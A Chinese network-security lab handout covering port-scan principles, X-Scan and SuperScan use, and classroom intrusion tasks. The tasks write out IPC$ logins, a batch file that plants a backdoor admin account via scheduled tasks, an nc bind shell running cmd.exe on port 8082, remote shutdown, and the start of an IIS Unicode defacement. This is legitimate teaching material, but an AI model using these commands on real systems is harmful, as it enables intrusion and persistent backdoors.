当前位置:文档之家› 网络安全扫描器及漏洞的入侵扫描

网络安全扫描器及漏洞的入侵扫描

单元三网络系统的安全配置与管理项目五网络安全扫描器及漏洞的入侵扫描教学目标1.了解安全扫描的的原理、作用和网络扫描工具X-scan、Superscan的主要原理;2.熟练掌握X-Scan、Superscan扫描器的使用,实现屏幕监视和控制和远程执行命令;3.掌握主机入侵方式及基于Unicode漏洞的入侵,提高计算机安全方面的安全隐患意识。

教学要求1.认真听讲,专心操作, 操作规范,认真记录实验过程,总结操作经验和写好实验报告,在实验中培养严谨科学的实践操作习惯;2.遵守学校的实验室纪律,注意人身和设备的安全操作,爱护实验设备、及时上缴作业;3.教学环境: Windows 7以及Windows server2003/2008以上操作系统。

知识要点1.了解安全扫描的的原理、作用;2.理解网络扫描工具X-scan、Superscan的主要原理。

;技术要点1.熟练掌握X-Scan、Superscan扫描器的使用,实现屏幕监视和控制和远程执行命令。

2.掌握主机入侵方式及基于Unicode漏洞的入侵,提高计算机安全方面的安全隐患意识。

技能训练一.讲授与示范正确启动计算机,在最后一个磁盘上建立以学号为名的文件夹,从指定的共享文件夹中将“实习指导书”和其他内容复制到该文件夹中。

(一)安全扫描的原理1.作用1)自动检测远程或本地主机安全脆弱点的程序;2)采用模拟攻击的形式对目标可能存在的已知安全漏洞进行逐项检查;3)并不是一个直接的攻击网络漏洞的程序;2.功能发现一个主机和网络的能力;一旦发现一台主机,有发现什么服务正运行在这台主机上的能力;通过测试这些服务,发现这些漏洞的能力。

(二)端口扫描扫描器主要可分为基于主机的和基于网络的两种。

真正的扫描器是TCP端口扫描器,可以连通TCP/IP端口和服务(比如,Telnet或FTP),并记录目标的回答,搜集到关于目标主机的有用信息。

1.TCP SYN 扫描原理:扫描程序发送的SYN数据包,准备打开一个新的连接并等待反映:一个SYN|ACK的返回信息表示端口处于侦听状态,一个RST 返回表示端口没有处于侦听状态。

优点:不会在目标计算机上留下纪录。

缺点:扫描程序必须要有root权限才能建立自己的SYN数据包。

2.TCP connect()扫描原理:利用操作系统提供connect()系统调用,与每一个感兴趣的目标计算机的端口进行连接,若端口处于侦听状态,那么connect()就能成功。

优点:系统中的任何用户都有权利使用这个调用;缺点:很容易被发现,目标计算机的logs文件会显示一连串连接和连接出错的消息,并且很快将它关闭。

3.TCP FIN 扫描原理:利用关闭的端口会用适当的RST来回复FIN数据包,而打开的端口会忽略对FIN数据包的回复。

优点:FIN数据包可以不惹任何麻烦的通过。

缺点:这种方法和系统的实现有一定的关系,有些系统不论是打开的或关闭的端口对FIN数据包都要给以回复,这种情况下该方法就不实用了。

(三)扫描工具的应用1.使用X-SCAN扫描局域网主机1)原理X-Scan采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能。

扫描计算机的端口、漏洞、某种服务、某个协议、系统密码,包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等20多个大类。

对于多数已知漏洞,给出了相应的漏洞描述、解决方案及详细描述链接。

通过扫描结果,可以了解的看到系统哪方面可能出现风险,比如密码太弱或者黑客可利用的漏洞等,以便即使采取措施对计算机系统进行加固。

2)X-Scan的使用任务1 系统弱口令扫描要求:利用X-Scan实现主机系统的是否存在NT弱口令(获取管理权限)步骤:①系统安装及设置下载X-Scan,并解压,运行xscan_gui.exe,并且设置扫描地址“设置”→“扫描参数”→指定IP范围:192.168.1.1-192.168.1.254。

如图1所示:②设置NT-Server弱口令全局设置→扫描模块→选择NT-Server等弱口令,如图2所示。

图 1 图 2③并发扫描及扫描报告的设置选择“并发扫描”,可以设置要扫描的最大并发主机数,和最大的并发线程数。

图3 图4选择‘扫描报告’,点击后会显示在右边的窗格中,它会生成一个检测IP或域名的报告文件,同时报告的文件类型可以有3种选择,分别是HTML、TXT、XML。

④其他设置及端口设置有2种条件扫描:1,‘跳过没有响应的主机’,2,‘无条件扫描’,如图5。

设置没有响应的主机:全局设置→其他设置→选中“跳过没有响应的主机”及其他相关;端口检测:插件设置→端口相关设置→待检测端口7,9,13,19,21,22,,20...→检测方式:SYN图5 图6 ‘端口相关设置’中可以自定义一些需要检测的端口。

检测方式“TCP”、“SYN”两种,TCP方式容易被对方发现,准确性要高一些,SYN则相反。

如图6所示。

⑤SNMP相关设置用来针对SNMP信息的一些检测设置,在监测主机数量不多的时候可以全选,如图7所示;⑥NETBIOS相关设置WINDOWS系统的NETBIOS信息的检测设置,包括的项目有很多种,根据实际需要进行选择,如图8。

图7 图8⑦字典文件设置是X-SCAN自带的一些用于破解远程账号所用的字典文件,这些字典都是简单或系统默认的账号等。

图9⑧开始扫描图10⑨扫描过程及扫描结果扫描结束以后会自动弹出检测报告,包括漏洞的风险级别和详细的信息,以便我们对对方主机进行详细的分析。

图11 图 11生成扫描报告如图11所示。

不同计算机扫描结果的报告存在差异。

2. superscan工具1)功能主要功能:检测一定范围内目标主机是否在线和端口开放情况,检测目标主机提供的各种服务,通过Ping 命令检验IP是否在线,进行IP与域名的转换等。

◆通过Ping来检验IP是否在线;◆ IP和域名相互转换;◆检验目标计算机提供的服务类别;◆检验一定范围目标计算机的是否在线和端口情况;◆工具自定义列表检验目标计算机是否在线和端口情况;◆自定义要检验的端口,并可以保存为端口列表文件;◆软件自带一个木马端口列表trojans.lst,通过这个列表我们可以检测目标计算机是否有木马;同时,也可以自己定义修改这个木马端口列表。

2)Superscan应用实例任务2 Superscan应用要求:运用Superscan选项的设置实现扫描目标主机的各种信息步骤:① Superscan是无需安装,下在解压后可以直接使用。

Superscan12的运行界面如下图所示。

图12 Supersca运行界面②在“开始IP”和“结束IP”:目标主机IP段,按“开始”:进行IP扫描,如下图13所示。

图13 IP段扫描实例③选择“主机和服务扫描设置”可对目标主机信息反馈方式、TUP及UDP端口进行设置。

如图14所示。

图14 主机和服务扫描设置窗口④选择“工具”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或者域名,然后选择“查找主机名/IP”、“Ping”等图标按钮,能够获取目标主机的各种信息了。

如下图所示。

图15 查找主机IP、Ping目标主机等⑤选择“Windows枚举”菜单命令,在“主机名/IP/URL”中输入目标主机的主机名、IP地址或者域名,然后选择需要枚举的类型,按“Enumerate”按钮,能够获取目标主机的各种枚举信息。

如图16所示。

图16 对目标主机各种信息进行枚举二.课堂任务实践任务3 主机入侵方式要求:多种方式实现对主机的入侵防范步骤:1)IPC$连接的建立与断开可运用空连接远程目标主机的条件是获到目标主机管理员帐号和密码,同时关闭杀毒软件或防火墙。

① DOS命令窗口前提:帐号是admin,密码是123456net use \\192.168.1.X\ipc$ "123456" /user:"admin" //成功②映射网络驱动器net use z: \\192.168.1.X\c$ //成功打开“我的电脑”则多了一个Z盘,即为目标主机的C盘,查找Z盘的指定文件③断开所有的IPC$连接net use */delnet use \\目标机地址\ipc$\del //删除指定主机2〕建立后门帐号①编写BAT文件hack.bat,内容为:net use sysback 123456/add //帐号和密码net localgroup administrators sysback /add②与目标主机建立IPC$连接③复制文件到目标主机copy hack.bat \\192.168.1.X\d$实现文件hack.bat拷贝到目标主机的D盘④查看目标主机时间:net time \\192.168.1.X⑤通过计划任务远程主机执行hack.bat文件,根据目标机的时间往后推几分种执行:at\\192.168.1.X 时间 d:\hack.bat \\运行hack.batnet use */del \\断开IPC$连接⑥验证帐号sysback是否成功建立net use \\192.168.1.X\ipc$ "123456" /user:"sysback"说明:若能建立连接则说明管理帐号“sysback”成功创建3〕NC连接操作用到的工具可以是:nc(打开后门程序),前提关闭杀毒软件(网上自行下载该工具) ①建立空连接格式:net use\\对方ip\ipc$“口令”/user:“用户名”例:net use \\192.168.0.X\ipc$ "123" /user:"administrator"②将后门程序(nc)拷贝到对方计算机copy nc.exe\\对方ip\admin$\system32(拷贝到system32的原因:是环境变量path=c:\winnt\system32;查看环境变量:我的电脑---属性--高级--环境变量--系统环境变量---系统缺省下的路径%SystemRoot%\system32;%SystemRoot%;) 例:copy c:\nc.exe \\192.168.0.206\admin$\system32③查看对方系统当前时间格式:net time\\对方ip例:net time\\192.168.0.208④定时启动nc程序根据第三步时间之后2,3分钟之后,定时在对方机子上启动nc程序:例:at\\对方IP 10:00 nc.exe -d -l -p 8082 -e cmd.exe◆ -d:-l:-p:在8082端口上等待的连接;◆ -e cmd.exe:以命令行方式运行) ;◆ at\\对方IP:在自己机子上查看是否执行;◆ at:在对方机子上查看是否执行;⑤连接对方的8082端口nc对方IP 8082(检查是否连接对方:ipconfig看本地连接是否为对方IP;添加用户和组等)⑥关闭对方计算机Shutdown \\对方IP T:20 (20秒后自动关闭对方计算机)任务4 基于Unicode漏洞的入侵(IIS漏洞)要求:使用Unicode编码实现网站“涂鸦”(目标系统windows2000)步聚:1)扫描远程服务器运用X-scan扫描远程服务器,寻找有漏洞的主机填好“指定IP范围”,在“全局设置”中“扫描模块”选择“漏洞检测脚本”后,进行扫描2)制作标语使用DreamWewaver制作一个标语网页,保存为1.htm,内容自定义。

相关主题